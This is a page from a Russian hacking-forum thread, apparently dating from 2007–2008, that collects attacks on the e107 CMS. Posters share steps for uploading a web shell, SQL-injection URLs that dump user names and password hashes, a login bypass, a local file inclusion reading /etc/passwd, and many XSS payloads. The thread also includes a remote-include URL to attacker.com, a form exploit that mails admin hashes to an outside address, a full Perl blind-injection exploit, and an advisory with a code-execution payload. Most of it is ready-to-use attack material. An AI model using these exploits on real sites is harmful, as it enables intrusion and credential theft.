Форум АНТИЧАТ
Страница 1 из 8 1 2 3 4 5 > Последняя »
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   [ Обзор уязвимостей e107 cms ] (https://forum.antichat.xyz/showthread.php?t=50683)

Nightmarе 16.08.2007 19:18
[ Обзор уязвимостей e107 cms ]
 
САБЖ

ettee 16.08.2007 19:47
Загрузка шела в e107 cms
 
Админка: " Зайгрузки файлов пользователями ": разрешаем загружать загрузки +"нормальный файл", добавляем " .php " в "Разрешённые типы файлов".
В меню появляются "Загрузка", заливаем файл.
target/e107_files/public/file.php +посмотреть полный путь можно через админ панель категория " Зайгрузки файлов пользователями "

blackybr 07.10.2007 12:07
Обзор уязвимостей [e107] cms
 
<=0.6

file create exploit

Уязвимость пристутствует из-за неправильной обработке реквестов к серверу, существует возможность послать свои собственные и создать произвольный файл.



<=0.6.17

Active xss

PoC



0.617

sql inj + remote code exec

Уязвимсоть присутствует из-за плохой проверки на логин. Возможно авторизироваться в админ панели с логином вида
Код:
or isnull(1/0)/*
Затем эксплоит заливает шелл через аплоуд модулей.



<=0.75

globals overwrite
Использует перезапись глобальных переменных с помощью пхп-баги - Zend_Hash_Del_Key_Or_Index

cookie file include
Работвет при register_globals = on, перезаписывает глобальную переменную e_LANGUAGE в кукисах.
Код:
Cookie: e107language_e107cookie=../../../../../../../../../etc/passwd%00


0.7.8

Upload file exploit (нужен админ)
Уязвимость присутствует из-за использования popen ф-ии на параметр $mailer, который пеердается через адресную строку в админ панеле.

Аплоуд файлов в галерее
Нет нормальной проверки на экстеншен. Возможен аплоуд файлов с расширением shell.php.jpg

ettee 07.10.2007 14:42
Multiple XSS in Chatbox, forum posts:
Код HTML:
[img]/imgsrc.png' onmouseover='alert("Vulnerable");[/img]
[link]/link.htm" onmouseover="alert('Vulnerable');[/link]
[email]/foo_at_bar.com"onmouseover="alert('Vulnerable');[/email]
[url]/url.htm" onmouseover="alert('Vulnerable');[/url]
e107 Subject field HTML injection Vulnerability
Код:
In Submit comment:
Subject: '><script>alert(/XSS/)</script>
0.545 & 0.603
e107 with the Chatbox.php (tagboard) module enabled.DoS.
In the Name inputbox of the Chatbox type:
Код:
<script = javascript> alert('DoS') <script>
6.*
Html attachment:
Код:
<html>
<body>
<script>alert('VULN');</script>
</body>
</html>
XSS Vulnerability in "Netquery" (nquser.php) plugin.
Код:
GET http://virtech.org/e107/e107_plugins/netquery/nquser.php HTTP/1.0
Accept: */*
Referer: http://virtech.org/tools/
Accept-Language: en-us
Pragma: no-cache
User-Agent: <script>alert()</script>
Host: virtech.org
Proxy-Connection: Keep-Alive
Cookie: e107_tdOffset=32630; e107_tdSetTime=1159974893; e107_tzOffset=420
Content-length: 0
0.6.15
XSS in "user settings" (usersettings.php):
Код:
http://target/e107_0615/usersettings.php?avmsg=[xss code here]
XSS Vulnerability in "Clock Menu" (clock_menu.php) plugin.
Код:
http://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22);//--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Other RFI:
0.6.15
Код:
http://target/e107_0615/e107_handlers/secure_img_render.php?p=http://attacker.com/evil.php
Other Sql injection:
0.6.15
Sql injection bug in "news.php":
Код:
http://localhost/e107_0615/news.php?list.99/**/UNION/**/SELECT/**/null,null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*
Sql injection bug in "content.php":
Код:
http://localhost/e107_0615/content.php?query=content_id=99%20UNION%20select%20null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null,null,null%20FROM%20e107_user%20WHERE%20user_id=1/*
Код:
http://localhost/e107_0615/content.php?content.99/**/UNION/**/SELECT/**/null,null,null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*

$n@ke 04.07.2008 13:23
Загрузка шела e107 cms
 
вот типа такого, но можно и без таблиц))но
надо знать диру для записи:

Цитата:
http://forum.antichat.ru/showpost.php?p=197748&postcount=22

http://forum.antichat.ru/showpost.php?p=83065&postcount=2

Dr.Z3r0 22.07.2008 02:48
Фу ты блин а я уж думал нету специальной темы под эту цмс. ГГ откопал)

0.7.11 (мб и ранние версии)
Passive XSS

Код:
http://e107/e107_plugins/content/handlers/content_preset.php
POST:addpreset=1&type=select&field=1'><script>alert()</script><&options[0]=1&options[1]=1

1ten0.0net1 26.07.2008 12:03
Эксплоит автора, который пожелал остаться неизвестным (действует в e107 0.7.8 точно, возможно, и других тоже)

Код:
<form action="http://tanibata.ru/contact.php" method="POST">
<input name="send-contactus" value="1"/>
<input name="body" value="This is a test email"/>
<input name="email_send" value="xeka@mail.ru"/>
<input name="author_name" value="user_name_here"/>
<input name="subject" value="It is e107 bug"/><br/>
<input size=200 name="contact_person" value="-999 union select 1,conсat(user_password,char(32),user_loginname,'<xeka@mail.ru>') from e107_user where user_id=1/*"/>
<br/><input type="submit" value="ok"/>
</form>
Само собой, при magic_quotes=On SQL-запрос нужно перекодировать char() или hex (0x..)

Rubaka 30.07.2008 12:51
e107 Plugin BLOG Engine v2.2 Blind SQL Injection Exploit
Код:
#!/usr/bin/perl
#####################################################################################
#        e107 Plugin BLOG Engine v2.2 Blind SQL Injection Exploit                  #
#                          ..::virangar security team::..                          #
#                              www.virangar.net                                    #
#                C0d3d BY:virangar security team ( hadihadi  )                    #
#special tnx to:                                                                    #
#MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra                                    #
#& all virangar members & all hackerz                                              #
# my lovely friends hadi_aryaie2004 & arash(imm02tal)                              #
#            ..:::Young Iranina Hackerz::..                                        #
#####################################################################################
#[-] note: becuse e107 using diffrent prefix/table names may it's not work good,but i wrote it for default mod  ;)
#this code is for english e107's only,if you want work on other languages,you can edit line 67;)

use HTTP::Request;
use LWP::UserAgent;

if (@ARGV != 1){
header();
}

$host = $ARGV[0];

print "\n md5 Password:\r\n";
&halghe();
print "\n[+]Done\n";


sub halghe {
for($i = 1; $i <= 32; $i++){
 $f = 0;
 $n = 48;
 while(!$f && $n <= 57)
 {
  if(&inject($host, $i, $n,)){
 $f = 1;
    syswrite(STDOUT, chr($n), 1);
  }
$n++;
}
if(!$f){
$n=97;
while(!$f && $n <= 102)
 {
  if(&inject($host, $i, $n,)){
 $f = 1;
    syswrite(STDOUT, chr($n), 1);
  }
$n++;
}}
}
}
sub inject {
my $site = $_[0];
my $a = $_[1];
my $b = $_[2];

$col = "user_password";

$attack= "$site"."%20and%20substring((select%20"."$col"."%20from%20e107_user%20where%20user_id=1%20limit%200,1),"."$a".",1)=char("."$b".")/*";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$req = $b->request(HTTP::Request->new(GET=>$attack));
$res = $req->content;

if ($res !~ /The user has hidden their blog./i){
    return 1;
}

}
sub header {
print qq{
###################################################################
# e107 Plugin BLOG Engine v2.2 Blind SQL Injection Exploit        #
#                  (just for english e107's)                      #
#                      www.virangar.net                          #
#  Useage: perl $0 Host                                          #
#                                                                #
#  Host: full patch to macgurublog.php+uid (dont forget http://) #
#                                                                #
#  Example:                                                      #
# perl $0 http://site/macgurublog_menu/macgurublog.php?uid=5      #
#                                                                #
###################################################################
};
}

# milw0rm.com [2008-07-29]

M4g 06.08.2008 16:54
>Эксплоит автора, который пожелал остаться неизвестным (действует в e107 0.7.8 точно, возможно, и других тоже)
это мой)

~!DoK_tOR!~ 10.08.2008 02:59
Description: e107 versions 0.7.11 and below suffer from an arbitrary variable overwriting vulnerability.

Код:
##########################################################
# GulfTech Security Research              August 07, 2008
##########################################################
# Vendor : Steve Dunstan
# URL : http://www.e107.org/
# Version : e107 <= 0.7.11
# Risk : Arbitrary Variable Overwriting
##########################################################


Description:
e107 is a popular full featured content management system written
in php. Unfortunately e107 suffers from an arbitrary variable
overwriting issue within it's download.php file that allows a number
of possible attacks to happen including, but possibly not limited to,
arbitrary php code execution and SQL Injection. No authentication
is required to exploit the issue and it can be exploited regardless
of php magic quotes settings. All users are encouraged to upgrade
their e107 installations as soon as possible.


Arbitrary Variable Overwriting:
There is an arbitrary variable overwrite issue in download.php that
is the result of unsafe usage of the php extract() function. Let's
have a look at the code located in download.php @ lines 85-86

case 'list' :        // Category-based listing
if (isset($_POST['view'])) extract($_POST);

As we see from the above code it is very much possible to overwrite
any variables declared up to this point, but what is the real risk
here? What attacks are possible because of this issue?

view=1&id=-99') UNION SELECT concat(user_name,char(58), user_password),
2,3,4 FROM e107_user WHERE user_id=1/*

One possible attack could involve an attacker sending a post request
to the downloads category view page (download.php?list.1 for example)
with the above data as the post contents, and as a result the username
and pass hash will be displayed in the page title. This SQL Injection
does require magic quotes to be set to it's default value of off.

view=1&action=maincats&execute=aWQ=&template_load_core=echo%20exec
(base64_decode($_POST[execute]));

In addition to the SQL Injection is an arbitrary php code execution
vulnerability. I found that it is possible to execute arbitrary php
code by sending a post request to the downloads category view page
with the above data as the post contents. The above example will
successfully execute the "id" shell command regardless if php magic
quotes gpc settings. A valid download category must be available
though, but this is trivial since an attacker can use the previously
explained SQL Injection to gain admin credentials and add a download
category. Other attacks may be possible though since a majority of
the important variables within the script are at risk.

Solution:
A fix for the issue mentioned in this advisory can be found in the
public e107 CVS repository, or accessed directly at the link below.

http://e107.cvs.sourceforge.net/e107/e107_0.7/download.php?r1=1.95&r2=1.96&view=patch&pathrev=MAIN

Credits:
James Bercegay of the GulfTech Security Research Team

Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00122-08072008


Время: 11:25
Страница 1 из 8 1 2 3 4 5 > Последняя »
Показывать 40 сообщений этой темы на одной странице